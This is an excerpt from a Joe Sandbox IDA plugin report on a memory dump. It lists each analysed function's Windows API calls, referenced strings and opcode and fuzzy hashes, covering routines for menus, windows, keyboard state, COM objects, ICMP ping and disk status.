Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction ID: 42d8d945d267367e7c425bcafd397c2074460a29e26f69528dcd43f9973055f5
Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
Instruction Fuzzy Hash: 4471FA71A01B17EBDB14AF78DC81BEAB7A9EF00324F144229F415D7685E770DA408BB0

Function 00DD57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD5816
GetMenuItemInfoW.USER32(00E518F0,000000FF,00000000,00000030), ref: 00DD5877
SetMenuItemInfoW.USER32(00E518F0,00000004,00000000,00000030), ref: 00DD58AD
Sleep.KERNEL32(000001F4), ref: 00DD58BF
GetMenuItemCount.USER32(?), ref: 00DD5903
GetMenuItemID.USER32(?,00000000), ref: 00DD591F
GetMenuItemID.USER32(?,-00000001), ref: 00DD5949
GetMenuItemID.USER32(?,?), ref: 00DD598E
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DD59D4
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD59E8
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD5A09

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7fabb2f87edb29906fb725e20cdb78df3d282da9701a61609d33017bc6feb373
Instruction ID: a2deb6cefed6a20255541a8b3b9a42dceba5a6df8bf94a283dc2999b1ede9930
Opcode Fuzzy Hash: 7fabb2f87edb29906fb725e20cdb78df3d282da9701a61609d33017bc6feb373
Instruction Fuzzy Hash: 5D61AA70900659EFDB10CFA4EC98EAE7BB9EB05318F18415AE481A3359D730AD05DB30

Function 00DF9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DF9AA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DF9AA8
GetWindowLongW.USER32(?,000000F0), ref: 00DF9ACC
_memset.LIBCMT ref: 00DF9ADD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DF9AEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DF9B67

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 8892bfb87e0ba50dce82f316d5c4d2f823502d004419a7bcdf4112d6e4023810
Instruction ID: bad13a7fdb4c0efc4baa9724873bef031824537667432175b451872a54d8af73
Opcode Fuzzy Hash: 8892bfb87e0ba50dce82f316d5c4d2f823502d004419a7bcdf4112d6e4023810
Instruction Fuzzy Hash: 8A617B71900208AFDB24DFA8CC91FEEB7B8EB09700F154599FA15E72A1D770AD45CB60

Function 00DD3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00DD3591
GetAsyncKeyState.USER32(000000A0), ref: 00DD3612
GetKeyState.USER32(000000A0), ref: 00DD362D
GetAsyncKeyState.USER32(000000A1), ref: 00DD3647
GetKeyState.USER32(000000A1), ref: 00DD365C
GetAsyncKeyState.USER32(00000011), ref: 00DD3674
GetKeyState.USER32(00000011), ref: 00DD3686
GetAsyncKeyState.USER32(00000012), ref: 00DD369E
GetKeyState.USER32(00000012), ref: 00DD36B0
GetAsyncKeyState.USER32(0000005B), ref: 00DD36C8
GetKeyState.USER32(0000005B), ref: 00DD36DA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2211d025b8895d73063e3325e69dfa5b1a31c4b3638de503c4f967fe08ae0d93
Instruction ID: d55f67a82ab06064a91a7a837b2ec7306640b1eeada4bf83e123c7592963f7a3
Opcode Fuzzy Hash: 2211d025b8895d73063e3325e69dfa5b1a31c4b3638de503c4f967fe08ae0d93
Instruction Fuzzy Hash: 11416F74508BC97DFF319B6498143A5AEA16B11344F4C805BD5C6563C2EBA4DBC8CBB3

Function 00DCA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00DCA2AA
SafeArrayAllocData.OLEAUT32(?), ref: 00DCA2F5
VariantInit.OLEAUT32(?), ref: 00DCA307
SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCA327
VariantCopy.OLEAUT32(?,?), ref: 00DCA36A
SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCA37E
VariantClear.OLEAUT32(?), ref: 00DCA393
SafeArrayDestroyData.OLEAUT32(?), ref: 00DCA3A0
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCA3A9
VariantClear.OLEAUT32(?), ref: 00DCA3BB
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCA3C6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 836fa4bf05c17543f3c6d2d774332c93d0c832752da006fcb176e06489aadd5a
Instruction ID: c67bfb2d454efdc3eccd68c2e975ec1910c748677e07edf0966835c6006dcf48
Opcode Fuzzy Hash: 836fa4bf05c17543f3c6d2d774332c93d0c832752da006fcb176e06489aadd5a
Instruction Fuzzy Hash: 2641FB7190021EAFDB019FA9DC84DDEBBB9FF48348F108069E551A7251DB34AA49CBB1

Function 00DEB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

CoInitialize.OLE32 ref: 00DEB298
CoUninitialize.COMBASE ref: 00DEB2A3
CoCreateInstance.COMBASE(?,00000000,00000017,00E1D8FC,?), ref: 00DEB303
IIDFromString.COMBASE(?,?), ref: 00DEB376
VariantInit.OLEAUT32(?), ref: 00DEB410
VariantClear.OLEAUT32(?), ref: 00DEB471

Strings

Invalid parameter, xrefs: 00DEB38F
NULL Pointer assignment, xrefs: 00DEB348
Failed to create object, xrefs: 00DEB30E, 00DEB3C4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: cb23e0f9cd7bed880572a222626d266b151c921cc31b31fde29f1cbb9cf777df
Instruction ID: e699d029aae1d02bb97d3fc19281123197b4ec70ec76c9c4b28d4814a7eb7727
Opcode Fuzzy Hash: cb23e0f9cd7bed880572a222626d266b151c921cc31b31fde29f1cbb9cf777df
Instruction Fuzzy Hash: 22618B70208341AFC710EF55C885B6BB7E8EF89724F14481AF985AB291C770ED48CBA2

Function 00DE8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00DE86F5
inet_addr.WS2_32(?), ref: 00DE873A
gethostbyname.WS2_32(?), ref: 00DE8746
IcmpCreateFile.IPHLPAPI ref: 00DE8754
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DE87C4
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DE87DA
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DE884F
WSACleanup.WS2_32 ref: 00DE8855

Strings

Ping, xrefs: 00DE8778

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ed4166cb943bac24cdede3e609ddae47d0feb07cc1b1e4e3d4f5586268dd4dcb
Instruction ID: 89de61b2e7444ad63c4d73b5259d0bc4a3dbee8ed9a552892d85251a8e704897
Opcode Fuzzy Hash: ed4166cb943bac24cdede3e609ddae47d0feb07cc1b1e4e3d4f5586268dd4dcb
Instruction Fuzzy Hash: DF51B531604301AFDB11EF26DD85B6A77E4EF48710F14852AF99AE72A1DB30DC05DB61

Function 00DF9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DF9C68
CreateMenu.USER32 ref: 00DF9C83
SetMenu.USER32(?,00000000), ref: 00DF9C92
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DF9D1F
IsMenu.USER32(?), ref: 00DF9D35
CreatePopupMenu.USER32 ref: 00DF9D3F
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DF9D70
DrawMenuBar.USER32 ref: 00DF9D7E

Strings

0, xrefs: 00DF9C61

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 90a69edb8def367ee06ec40e3d3f59f3579552db69a4e6ae89836d245eb844e1
Instruction ID: 47d97295be48d5148088839437fbf1a9e24a9c7057f2bc5908841129c6205b26
Opcode Fuzzy Hash: 90a69edb8def367ee06ec40e3d3f59f3579552db69a4e6ae89836d245eb844e1
Instruction Fuzzy Hash: D9416A75A00209EFDB25EF65DC54BEABBB6FF48304F298428EA45A7351D730A914CF60

Function 00DDEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DDEC1E
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DDEC94
GetLastError.KERNEL32 ref: 00DDEC9E
SetErrorMode.KERNEL32(00000000,READY), ref: 00DDED0B

Strings

INVALID, xrefs: 00DDECDD
READY, xrefs: 00DDECE4
UNKNOWN, xrefs: 00DDECC3
NOTREADY, xrefs: 00DDECCA
READONLY, xrefs: 00DDECD6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: eb7aa294e823abf2504b4cba65117ce9a402c83dcbda31664abaacd62110a4c3
Instruction ID: 9b372d76bc9b7828bfed832e285ea5c76bffd72bbcaab2824252d101925c79fa
Opcode Fuzzy Hash: eb7aa294e823abf2504b4cba65117ce9a402c83dcbda31664abaacd62110a4c3
Instruction Fuzzy Hash: AE319035A00209EFCB10EF69DD45AAEB7B4EF44700F148026E506EB391DA71DA41CBB1

Function 00DCC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00DCC782
GetDlgCtrlID.USER32 ref: 00DCC78D
GetParent.USER32 ref: 00DCC7A9
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DCC7AC
GetDlgCtrlID.USER32(?), ref: 00DCC7B5
GetParent.USER32(?), ref: 00DCC7D1
SendMessageW.USER32(00000000,?,?,00000111), ref: 00DCC7D4

Strings

ListBox, xrefs: 00DCC73F
ComboBox, xrefs: 00DCC707

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: 390458c13bbe05091ae2195a179d2cb5b75d276fec360a27f24212fde29cd6c6
Instruction ID: da09beaf94a1762cad4fa9d90da3dfe3fa07d0ff267f50fc0bfb376791281d93
Opcode Fuzzy Hash: 390458c13bbe05091ae2195a179d2cb5b75d276fec360a27f24212fde29cd6c6
Instruction Fuzzy Hash: 2621A1B4A00209AFDF05EF65CC85EFEB765EB45310F144119F666E32D1DB789819AB30

Function 00DCC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00DCC869
GetDlgCtrlID.USER32 ref: 00DCC874
GetParent.USER32 ref: 00DCC890
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DCC893
GetDlgCtrlID.USER32(?), ref: 00DCC89C
GetParent.USER32(?), ref: 00DCC8B8
SendMessageW.USER32(00000000,?,?,00000111), ref: 00DCC8BB

Strings

ListBox, xrefs: 00DCC828
ComboBox, xrefs: 00DCC7F0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: a96448a4fa9bfc7671f5e8358ae8aa4c35dcba6a1a3190334bad8e7acb06648f
Instruction ID: ac524c216e89d21b6200322c72cb2b7ebfab4818096f7f919b3698da7cf6597e
Opcode Fuzzy Hash: a96448a4fa9bfc7671f5e8358ae8aa4c35dcba6a1a3190334bad8e7acb06648f
Instruction Fuzzy Hash: 7221AFB1A00209AFDF01AFA5CC85EFEBB69EF45300F144119F665E3191DB789819AB30

Function 00DCC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00DCC8D9
GetClassNameW.USER32(00000000,?,00000100), ref: 00DCC8EE
_wcscmp.LIBCMT ref: 00DCC900
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DCC97B

Strings

smallicons, xrefs: 00DCC943
list, xrefs: 00DCC95D
details, xrefs: 00DCC929
largeicons, xrefs: 00DCC90F
SHELLDLL_DefView, xrefs: 00DCC8FA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 815b20fb3d3f5a8456ff6554f33dd3307754b28d17cd759da4a183a006b31357
Instruction ID: ebb76d1420995d8aba2b178e350d02a460e5266ba65cef6f61ceeed9de1be1a5
Opcode Fuzzy Hash: 815b20fb3d3f5a8456ff6554f33dd3307754b28d17cd759da4a183a006b31357
Instruction Fuzzy Hash: 5711C67A658303B9FA152A30AC0AEE6779CDB07765B20111AFB19F70D2FF71A9018974

Function 00DDB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00DDB137

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 424529dc2c51be229ff7183ffe44a9807e9477a7876a1fee3b801d46c9657d03
Instruction ID: d70c79df41c754eed8f86cc1d6e7e5a06238cf64fb5da83aa686521cc7036acc
Opcode Fuzzy Hash: 424529dc2c51be229ff7183ffe44a9807e9477a7876a1fee3b801d46c9657d03
Instruction Fuzzy Hash: 47C18D75A0021ADFDB04CF98C481BAEBBB4FF09329F25806BE655E7341D734A945DBA0

Function 00DBBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00DBBA74

Part of subcall function 00DB8984: __mtinitlocknum.LIBCMT ref: 00DB8996
Part of subcall function 00DB8984: RtlEnterCriticalSection.NTDLL(00DB0127), ref: 00DB89AF

__calloc_crt.LIBCMT ref: 00DBBA85

Part of subcall function 00DB7616: __calloc_impl.LIBCMT ref: 00DB7625
Part of subcall function 00DB7616: Sleep.KERNEL32(00000000,?,00DB0127,?,00D9125D,00000058,?,?), ref: 00DB763C

@_EH4_CallFilterFunc@8.LIBCMT ref: 00DBBAA0
GetStartupInfoW.KERNEL32(?,00E46990,00000064,00DB6B14,00E467D8,00000014), ref: 00DBBAF9
__calloc_crt.LIBCMT ref: 00DBBB44
GetFileType.KERNEL32(00000001), ref: 00DBBB8B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00DBBBC4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: a82f6c04cf9d1eeffc36bfc1726369327893a5665810f018f064f2a7df9dd582
Instruction ID: 97a69d59402f930c253271cbe0c31ffbb2876eba8c1c86019b77c27a9d6fb486
Opcode Fuzzy Hash: a82f6c04cf9d1eeffc36bfc1726369327893a5665810f018f064f2a7df9dd582
Instruction Fuzzy Hash: CD81A071904745CFDB24CF69C8806E9BBB0EF49334B28465ED4A7AB3D1CBB49806CB64

Function 00DD4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DD4A7D
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DD3AD7,?,00000001), ref: 00DD4A91
GetWindowThreadProcessId.USER32(00000000), ref: 00DD4A98
